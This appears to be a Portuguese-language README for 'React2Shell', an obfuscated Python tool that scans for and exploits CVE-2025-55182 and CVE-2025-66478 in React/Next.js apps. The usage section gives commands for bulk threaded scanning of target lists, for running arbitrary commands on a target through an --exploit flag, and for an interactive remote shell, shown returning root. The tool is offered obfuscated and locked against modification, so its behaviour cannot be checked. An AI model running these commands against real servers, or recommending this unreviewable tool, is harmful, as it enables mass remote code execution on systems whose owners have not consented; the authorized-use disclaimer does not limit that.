
React2Shell - CVE-2025-55182 & CVE-2025-66478
Autor: LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
Versão: 2.0.0 (Ofuscado)
Data: 2025-12-07
python react2shell.py
É isso! O scanner irá:
[1] Scan Single URL
[2] Scan Multiple URLs from File
[3] Exploit Single URL
[4] Exploit Multiple URLs from File
[5] Interactive Shell (Exploit Mode)
[6] Settings
[7] View Previous Results
[0] Exit
python react2shell.py
# Scan single URL
python react2shell.py -u https://target.com
# Scan multiple URLs
python react2shell.py -f targets.txt
# Exploit with command
python react2shell.py -u https://target.com --exploit -c "whoami"
# Bulk scan with threads
python react2shell.py -f targets.txt -t 20 -o results.json
Toda vez que você executa o scanner, ele automaticamente:
Se alguém tentar modificar o código ofuscado:
[ERROR] Scanner integrity check FAILED!
[!] The scanner code has been tampered with.
[!] This is a protected tool by LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
O scanner se recusará a executar se detectar qualquer adulteração.
Todos os recursos originais são 100% preservados:
python react2shell.py -u https://example.com
Saída:
=================================================================
CVE Scanner - CVE-2025-55182 & CVE-2025-66478
Author: LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
=================================================================
[*] Scanning: https://example.com
[+] VULNERABLE: https://example.com
Version: 15.0.1
CVE-2025-55182: VULNERABLE
CVE-2025-66478: VULNERABLE
python react2shell.py
# Select option 5
# Enter target URL
Sessão do Shell:
shell> whoami
root
shell> pwd
/app
shell> ls -la
total 120
drwxr-xr-x 1 root root 4096 Dec 6 10:30 .
...
shell> exit
python react2shell.py -f targets.txt -t 20 -o results.json
Esta ferramenta é SOMENTE PARA TESTES DE SEGURANÇA AUTORIZADOS!
✅ Seus próprios aplicativos
✅ Testes de penetração autorizados
✅ Programas de bug bounty (no escopo)
✅ Pesquisa de segurança (autorizada)
❌ Varredura não autorizada
❌ Exploração não autorizada
❌ Qualquer atividade ilegal
❌ Violação dos termos de serviço
O autor (LAKSHMIKANTHAN K) não é responsável pelo uso indevido desta ferramenta. Os usuários são os únicos responsáveis por suas ações e devem cumprir todas as leis aplicáveis.
Causa: O arquivo está corrompido
Solução: Baixe uma cópia nova
Causa: O arquivo foi modificado
Solução: Baixe uma cópia nova (não modifique o arquivo)
Causa: Dependências ausentes
Solução:
pip install requests urllib3
Causa: Sobrecarga de descompressão (mínima)
Nota: Acontece apenas uma vez na inicialização, depois executa em velocidade total
R: O código é ofuscado e comprimido. Você pode usar a versão original não ofuscada se precisar ler o código.
R: Impacto mínimo. Há um pequeno atraso na inicialização para descompressão (~0,1 segundos), depois executa em velocidade total.
R: Não. Qualquer modificação quebrará a verificação de integridade e o scanner se recusará a executar.
R: Ofuscação não é criptografia. Atacantes determinados ainda podem fazer engenharia reversa, mas é muito difícil e demorado.
R: Entre em contato com o autor no Instagram: @letchu_pkt
Nome: LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
Se você encontrar problemas:
pip install requests urllib3
python react2shell.py
Escolha no menu interativo ou use o modo CLI.
Siga as instruções ou forneça argumentos de linha de comando.
# Interactive mode
python react2shell.py
# Scan single URL
python react2shell.py -u https://target.com
# Bulk scan
python react2shell.py -f targets.txt -t 20
# Exploit
python react2shell.py -u https://target.com --exploit -c "whoami"
# Help
python react2shell.py --help
LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
Obrigado por usar o CVE Scanner! 🚀
Versão: 2.0.0 (Ofuscado)
Data: 2025-12-07
Licença: Somente para testes de segurança autorizados